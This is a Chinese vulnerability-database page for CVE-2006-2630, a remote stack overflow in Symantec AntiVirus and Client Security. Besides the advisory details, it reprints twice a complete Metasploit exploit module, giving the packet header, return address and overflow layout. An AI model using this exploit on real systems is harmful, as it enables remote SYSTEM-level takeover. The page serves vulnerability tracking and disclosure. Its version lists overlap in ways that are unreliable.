CVE-2006-2630
CVSS10.0
发布时间 :2006-05-27 17:02:00
修订时间 :2011-03-07 21:36:36
NMCOEPS    

[原文]Stack-based buffer overflow in Symantec Antivirus 10.1 and Client Security 3.1 allows remote attackers to execute arbitrary code via unknown attack vectors.


[CNNVD]Symantec Antivirus 远程管理接口 栈溢出漏洞(CNNVD-200605-498)

        Symantec AntiVirus是非常流行的杀毒解决方案。
        Symantec Antivirus远程管理接口中存在远程栈溢出漏洞。受影响产品通讯所使用的远程管理协议是基于消息的私有协议,有两级封装。外层由消息头组成,可能为消息类型10,表示请求Rtvscan.exe,也可能为类型20或30,表示转发SSL协商。如果为TCP连接创建了SSL,则之后的通讯就会加密,尽管私有格式中仍有明文。
        类型10消息的数据包含有自己的首部和消息体,均由Rtvscan.exe处理。这个首部中有一个命令字段,指定将要执行的操作和消息体数据的格式。
        COM_FORWARD_LOG (0x24)命令处理器没有正确的使用strncat,允许用任意数据覆盖0x180字节的栈缓冲区。如果COM_FORWARD_LOG请求中的第一个字符串包含有反斜线,就会执行以下两个strncat调用之一:
        * 如果字符串包含有逗号但没有双引号:
        strncat(dest, src, 0x17A - strlen(src));
        * 否则:
        strncat(dest, src, 0x17C - strlen(src));
        如果源字符串的长度分别超过了0x17A或0x17C个字符的话,算术就会下溢,导致很大的内存拷贝大小。这可能允许将这个源字符串附加到缓冲区,用64KB的数据(空字符除外)覆盖栈。
        Rtvscan.exe是用Visual Studio /GS安全选项编译的,包含有栈canary检查。但攻击者可以通过很大的覆盖并控制异常处理器注册绕过这个安全措施。
        
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:symantec:norton_antivirus:10.0::corporate
cpe:/a:symantec:client_security:3.0.2.2020Symantec Client Security 3.0.2.2020
cpe:/a:symantec:norton_antivirus:10.1::corporate
cpe:/a:symantec:norton_antivirus:10.0.2.2010::corporate
cpe:/a:symantec:norton_antivirus:10.1.400::corporate
cpe:/a:symantec:client_security:3.1.400Symantec Client Security 3.1.400
cpe:/a:symantec:norton_antivirus:10.0.2.2020::corporate
cpe:/a:symantec:client_security:3.1
cpe:/a:symantec:client_security:3.0.2.2010Symantec Client Security 3.0.2.2010
cpe:/a:symantec:client_security:3.0Symantec Client Security 3.0
cpe:/a:symantec:norton_antivirus:10.0.2.2021::corporate
cpe:/a:symantec:client_security:3.1.394Symantec Client Security 3.1.394

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2630
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2630
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-498
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/404910
(PATCH)  CERT-VN  VU#404910
http://www.securityfocus.com/bid/18107
(PATCH)  BID  18107
http://securitytracker.com/id?1016162
(PATCH)  SECTRACK  1016162
http://securitytracker.com/id?1016161
(PATCH)  SECTRACK  1016161
http://securityresponse.symantec.com/avcenter/security/Content/2006.05.25.html
(VENDOR_ADVISORY)  CONFIRM  http://securityresponse.symantec.com/avcenter/security/Content/2006.05.25.html
http://secunia.com/advisories/20318
(VENDOR_ADVISORY)  SECUNIA  20318
http://www.vupen.com/english/advisories/2006/2005
(UNKNOWN)  VUPEN  ADV-2006-2005
http://www.securityfocus.com/archive/1/archive/1/435200/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060527 Symantec antivirus software exposes computers
http://www.eeye.com/html/research/upcoming/20060524.html
(UNKNOWN)  EEYE  EEYEB-20060524
http://xforce.iss.net/xforce/xfdb/26706
(UNKNOWN)  XF  symantec-antivirus-client-bo(26706)
http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/046355.html
(UNKNOWN)  FULLDISC  20060526 new symantec vuln

- 漏洞信息

Symantec Antivirus 远程管理接口 栈溢出漏洞
危急 缓冲区溢出
2006-05-27 00:00:00 2007-02-08 00:00:00
远程※本地  
        Symantec AntiVirus是非常流行的杀毒解决方案。
        Symantec Antivirus远程管理接口中存在远程栈溢出漏洞。受影响产品通讯所使用的远程管理协议是基于消息的私有协议,有两级封装。外层由消息头组成,可能为消息类型10,表示请求Rtvscan.exe,也可能为类型20或30,表示转发SSL协商。如果为TCP连接创建了SSL,则之后的通讯就会加密,尽管私有格式中仍有明文。
        类型10消息的数据包含有自己的首部和消息体,均由Rtvscan.exe处理。这个首部中有一个命令字段,指定将要执行的操作和消息体数据的格式。
        COM_FORWARD_LOG (0x24)命令处理器没有正确的使用strncat,允许用任意数据覆盖0x180字节的栈缓冲区。如果COM_FORWARD_LOG请求中的第一个字符串包含有反斜线,就会执行以下两个strncat调用之一:
        * 如果字符串包含有逗号但没有双引号:
        strncat(dest, src, 0x17A - strlen(src));
        * 否则:
        strncat(dest, src, 0x17C - strlen(src));
        如果源字符串的长度分别超过了0x17A或0x17C个字符的话,算术就会下溢,导致很大的内存拷贝大小。这可能允许将这个源字符串附加到缓冲区,用64KB的数据(空字符除外)覆盖栈。
        Rtvscan.exe是用Visual Studio /GS安全选项编译的,包含有栈canary检查。但攻击者可以通过很大的覆盖并控制异常处理器注册绕过这个安全措施。
        
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.symantec.com/techsupp/enterprise/select_product_updates.html

- 漏洞信息 (16830)

Symantec Remote Management Buffer Overflow (EDBID:16830)
windows remote
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: symantec_rtvscan.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Symantec Remote Management Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Symantec Client Security 3.0.x.
				This module has only been tested against Symantec Client Security 3.0.2
				build 10.0.2.2000.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					['CVE', '2006-2630'],
					['OSVDB', '25846'],
					['BID', '18107'],
					['URL', 'http://research.eeye.com/html/advisories/published/AD20060612.html'],
				],
			'Privileged'     => true,

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'SCS 3.0.2 build 10.0.2.2000', { 'Ret' => 0x69985624 } ], # Dec2TAR.dll
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'May 24 2006'))

		register_options(
			[
				Opt::RPORT(2967)
			], self.class)
	end

	def exploit
		connect

		header =  "\x01\x10\x0a\x20\x0a\x00\x00\x00"
		header << "\x02\x18\x00\x01\x00\x00\x00\x00"
		header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
		header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"

		crufta =  rand_text_alphanumeric(512)
		cruftb =  rand_text_alphanumeric(514)
		cruftc =  payload.encoded + rand_text_alphanumeric(513 - payload.encoded.length)
		cruftd =  rand_text_alphanumeric(495)

		cruftd[479, 2] = "\xeb\x06"
		cruftd[483, 4] = [target.ret].pack('V')
		cruftd[487, 5] = [0xe8, -1000].pack('CV')

		cruftd << rand_text_alphanumeric(21)
		crufte =  rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
		crufte << rand_text_alphanumeric(504) + "\x00\x00"

		overflow =  [ crufta.length ].pack('v') + crufta
		overflow << [ cruftb.length ].pack('v') + cruftb
		overflow << [ cruftc.length ].pack('v') + cruftc
		overflow << [ cruftd.length ].pack('v') + cruftd
		overflow << [ crufte.length ].pack('v') + crufte

		sploit = header + overflow

		print_status("Trying target #{target.name}...")
		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83223)

Symantec Remote Management Buffer Overflow (PacketStormID:F83223)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2006-2630
[点击下载]

This Metasploit module exploits a stack overflow in Symantec Client Security 3.0.x. This Metasploit module has only been tested against Symantec Client Security 3.0.2 build 10.0.2.2000.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Symantec Remote Management Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Symantec Client Security 3.0.x.
				This module has only been tested against Symantec Client Security 3.0.2
				build 10.0.2.2000.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-2630'],
					['OSVDB', '25846'],
					['BID', '18107'],
					['URL', 'http://research.eeye.com/html/advisories/published/AD20060612.html'],
				],
			'Privileged'     => true,
                        
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},

			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'SCS 3.0.2 build 10.0.2.2000', { 'Ret' => 0x69985624 } ], # Dec2TAR.dll
				],

			'DefaultTarget' => 0,

			'DisclosureDate' => 'May 24 2006'))
			
			register_options( [ Opt::RPORT(2967) ], self.class )
	end

	def exploit
		connect
		
		header =  "\x01\x10\x0a\x20\x0a\x00\x00\x00"
		header << "\x02\x18\x00\x01\x00\x00\x00\x00"
		header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
		header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"

		crufta =  rand_text_alphanumeric(512)
		cruftb =  rand_text_alphanumeric(514)
		cruftc =  payload.encoded + rand_text_alphanumeric(513 - payload.encoded.length)
		cruftd =  rand_text_alphanumeric(495)
		
		cruftd[479, 2] = "\xeb\x06"
		cruftd[483, 4] = [target.ret].pack('V')
		cruftd[487, 5] = [0xe8, -1000].pack('CV')
		
		cruftd << rand_text_alphanumeric(21)
		crufte =  rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
		crufte << rand_text_alphanumeric(504) + "\x00\x00"

		overflow =  [ crufta.length ].pack('v') + crufta
		overflow << [ cruftb.length ].pack('v') + cruftb
		overflow << [ cruftc.length ].pack('v') + cruftc
		overflow << [ cruftd.length ].pack('v') + cruftd 
		overflow << [ crufte.length ].pack('v') + crufte

		sploit = header + overflow

		print_status("Trying target #{target.name}...")
		sock.put(sploit)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

25846
Symantec Client Security / AntiVirus Management Interface Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified, Coordinated Disclosure

- 漏洞描述

A buffer overflow overflow exists in the Client Security and AntiVirus products. The Remote Management interface fails to valid input to the COM_FORWARD_LOG command handler resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-05-24 Unknow
Unknow 2006-06-12

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Symantec has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Symantec AntiVirus Remote Stack Buffer Overflow Vulnerability
Boundary Condition Error 18107
Yes Yes
2006-05-24 12:00:00 2007-11-01 04:26:00
Derek Soeder is credited with the discovery of this vulnerability.

- 受影响的程序版本

Symantec Client Security 3.1 .400
Symantec Client Security 3.1 .394
Symantec Client Security 3.0.2 .2020
Symantec Client Security 3.0.2 .2010
Symantec Client Security 3.0.2 .2001
Symantec Client Security 3.0.2 .2000
Symantec Client Security 3.0
Symantec Client Security 3.1
Symantec AntiVirus Corporate Edition 10.1 .400
Symantec AntiVirus Corporate Edition 10.1 .394
Symantec AntiVirus Corporate Edition 10.0.2 .2020
Symantec AntiVirus Corporate Edition 10.0.2 .2010
Symantec AntiVirus Corporate Edition 10.0.2 .2001
Symantec AntiVirus Corporate Edition 10.0.2 .2000
Symantec AntiVirus Corporate Edition 10.0
Symantec AntiVirus Corporate Edition 10.1
Symantec Client Security 3.1 .401
Symantec Client Security 3.1 .396
Symantec Client Security 3.0.2 .2021
Symantec Client Security 3.0.2 .2011
Symantec Client Security 3.0.2 .2002
Symantec Client Security 2.0.3 MR3 b9.0.3.1000
Symantec Client Security 2.0.2 MR2 b9.0.2.1000
Symantec Client Security 2.0.1 MR1 b9.0.1.1000
Symantec Client Security 2.0 STM build 9.0.0.338
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 2.0
Symantec Client Security 1.1.1 MR5 build 8.1.1.336
Symantec Client Security 1.1.1 MR4 build 8.1.1.329
Symantec Client Security 1.1.1 MR3 build 8.1.1.323
Symantec Client Security 1.1.1 MR2 build 8.1.1.319
Symantec Client Security 1.1.1 MR1 build 8.1.1.314a
Symantec Client Security 1.1.1 MR6 b8.1.1.266
Symantec Client Security 1.1.1
Symantec Client Security 1.1 STM b8.1.0.825a
Symantec Client Security 1.1
Symantec Client Security 1.0.1 MR8 build 8.01.471
Symantec Client Security 1.0.1 MR7 build 8.01.464
Symantec Client Security 1.0.1 MR6 build 8.01.460
Symantec Client Security 1.0.1 MR5 build 8.01.457
Symantec Client Security 1.0.1 MR4 build 8.01.446
Symantec Client Security 1.0.1 MR3 build 8.01.434
Symantec Client Security 1.0.1 build 8.01.437
Symantec Client Security 1.0.1 MR9 b8.01.501
Symantec Client Security 1.0.1 MR2 b8.01.429c
Symantec Client Security 1.0.1 MR1 b8.01.425a/b
Symantec Client Security 1.0.1
Symantec Client Security 1.0 .0 b8.01.9378
Symantec Client Security 1.0 b8.01.9374
Symantec Client Security 1.0
Symantec AntiVirus Corporate Edition 10.1 .401
Symantec AntiVirus Corporate Edition 10.1 .396
Symantec AntiVirus Corporate Edition 10.0.2 .2021
Symantec AntiVirus Corporate Edition 10.0.2 .2011
Symantec AntiVirus Corporate Edition 10.0.2 .2002
Symantec AntiVirus Corporate Edition 9.0.4
Symantec AntiVirus Corporate Edition 9.0.3 .1000
Symantec AntiVirus Corporate Edition 9.0.2 .1000
Symantec AntiVirus Corporate Edition 9.0.1 .1.1000
Symantec AntiVirus Corporate Edition 9.0 .0.338
Symantec AntiVirus Corporate Edition 9.0
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.329
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.323
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.319
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.314a
Symantec AntiVirus Corporate Edition 8.1.1 .377
Symantec AntiVirus Corporate Edition 8.1.1 .366
Symantec AntiVirus Corporate Edition 8.1.1
Symantec AntiVirus Corporate Edition 8.1 build 8.01.471
Symantec AntiVirus Corporate Edition 8.1 build 8.01.464
Symantec AntiVirus Corporate Edition 8.1 build 8.01.460
Symantec AntiVirus Corporate Edition 8.1 build 8.01.457
Symantec AntiVirus Corporate Edition 8.1 build 8.01.446
Symantec AntiVirus Corporate Edition 8.1 build 8.01.437
Symantec AntiVirus Corporate Edition 8.1 build 8.01.434
Symantec AntiVirus Corporate Edition 8.1 .0.825a
Symantec AntiVirus Corporate Edition 8.1
Symantec AntiVirus Corporate Edition 8.0 1.9378
Symantec AntiVirus Corporate Edition 8.0 1.9374
Symantec AntiVirus Corporate Edition 8.0 1.501
Symantec AntiVirus Corporate Edition 8.0 1.429c
Symantec AntiVirus Corporate Edition 8.0 1.425a/b
Symantec AntiVirus Corporate Edition 8.0 1
Symantec AntiVirus Corporate Edition 8.0

- 不受影响的程序版本

Symantec Client Security 3.1 .401
Symantec Client Security 3.1 .396
Symantec Client Security 3.0.2 .2021
Symantec Client Security 3.0.2 .2011
Symantec Client Security 3.0.2 .2002
Symantec Client Security 2.0.3 MR3 b9.0.3.1000
Symantec Client Security 2.0.2 MR2 b9.0.2.1000
Symantec Client Security 2.0.1 MR1 b9.0.1.1000
Symantec Client Security 2.0 STM build 9.0.0.338
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 2.0
Symantec Client Security 1.1.1 MR5 build 8.1.1.336
Symantec Client Security 1.1.1 MR4 build 8.1.1.329
Symantec Client Security 1.1.1 MR3 build 8.1.1.323
Symantec Client Security 1.1.1 MR2 build 8.1.1.319
Symantec Client Security 1.1.1 MR1 build 8.1.1.314a
Symantec Client Security 1.1.1 MR6 b8.1.1.266
Symantec Client Security 1.1.1
Symantec Client Security 1.1 STM b8.1.0.825a
Symantec Client Security 1.1
Symantec Client Security 1.0.1 MR8 build 8.01.471
Symantec Client Security 1.0.1 MR7 build 8.01.464
Symantec Client Security 1.0.1 MR6 build 8.01.460
Symantec Client Security 1.0.1 MR5 build 8.01.457
Symantec Client Security 1.0.1 MR4 build 8.01.446
Symantec Client Security 1.0.1 MR3 build 8.01.434
Symantec Client Security 1.0.1 build 8.01.437
Symantec Client Security 1.0.1 MR9 b8.01.501
Symantec Client Security 1.0.1 MR2 b8.01.429c
Symantec Client Security 1.0.1 MR1 b8.01.425a/b
Symantec Client Security 1.0.1
Symantec Client Security 1.0 .0 b8.01.9378
Symantec Client Security 1.0 b8.01.9374
Symantec Client Security 1.0
Symantec AntiVirus Corporate Edition 10.1 .401
Symantec AntiVirus Corporate Edition 10.1 .396
Symantec AntiVirus Corporate Edition 10.0.2 .2021
Symantec AntiVirus Corporate Edition 10.0.2 .2011
Symantec AntiVirus Corporate Edition 10.0.2 .2002
Symantec AntiVirus Corporate Edition 9.0.4
Symantec AntiVirus Corporate Edition 9.0.3 .1000
Symantec AntiVirus Corporate Edition 9.0.2 .1000
Symantec AntiVirus Corporate Edition 9.0.1 .1.1000
Symantec AntiVirus Corporate Edition 9.0 .0.338
Symantec AntiVirus Corporate Edition 9.0
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.329
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.323
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.319
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.314a
Symantec AntiVirus Corporate Edition 8.1.1 .377
Symantec AntiVirus Corporate Edition 8.1.1 .366
Symantec AntiVirus Corporate Edition 8.1.1
Symantec AntiVirus Corporate Edition 8.1 build 8.01.471
Symantec AntiVirus Corporate Edition 8.1 build 8.01.464
Symantec AntiVirus Corporate Edition 8.1 build 8.01.460
Symantec AntiVirus Corporate Edition 8.1 build 8.01.457
Symantec AntiVirus Corporate Edition 8.1 build 8.01.446
Symantec AntiVirus Corporate Edition 8.1 build 8.01.437
Symantec AntiVirus Corporate Edition 8.1 build 8.01.434
Symantec AntiVirus Corporate Edition 8.1 .0.825a
Symantec AntiVirus Corporate Edition 8.1
Symantec AntiVirus Corporate Edition 8.0 1.9378
Symantec AntiVirus Corporate Edition 8.0 1.9374
Symantec AntiVirus Corporate Edition 8.0 1.501
Symantec AntiVirus Corporate Edition 8.0 1.429c
Symantec AntiVirus Corporate Edition 8.0 1.425a/b
Symantec AntiVirus Corporate Edition 8.0 1
Symantec AntiVirus Corporate Edition 8.0

- 漏洞讨论

Multiple Symantec products are prone to a remote stack buffer-overflow vulnerability.

This issue allows remote attackers to execute arbitrary machine code with SYSTEM-level privileges, facilitating the complete compromise of affected computers.

Symantec AntiVirus Corporate Edition 10.1 and Symantec Client Security 3.1 are currently known to be vulnerable to this issue. All supported platforms are affected including Microsoft Windows and Novell Netware.

- 漏洞利用

Reports indicate that the worms 'W32.Spybot.ACYR' and 'W32.Spybot.AMTE' may be exploiting this issue in the wild.

An exploit is available to members of the Immunity Partner's program:

https://www.immunityinc.com/downloads/immpartners/symantec_rm.tar

This issue is actively being exploited in the wild by 'W32.Sagevo'. A recent spike of exploit activity is also reported.

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

Symantec has released an advisory with more information regarding this issue.

Fixes for all supported platforms, including Microsoft Windows and Novell NetWare, are available from the following URI:

http://www.symantec.com/techsupp/enterprise/select_product_updates.html

Fixes for localized versions are available from the following URI:

http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2006052609181248

NOTE: Given the recent spike in exploit activity in the wild by 'W32.Sagevo', customers running vulnerable versions of the affected software should install fixes as soon as possible.


Symantec AntiVirus Corporate Edition 10.0.2 .2001

Symantec AntiVirus Corporate Edition 10.0.2 .2020

Symantec AntiVirus Corporate Edition 10.0.2 .2000

Symantec AntiVirus Corporate Edition 10.1 .394

Symantec AntiVirus Corporate Edition 10.1 .400

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站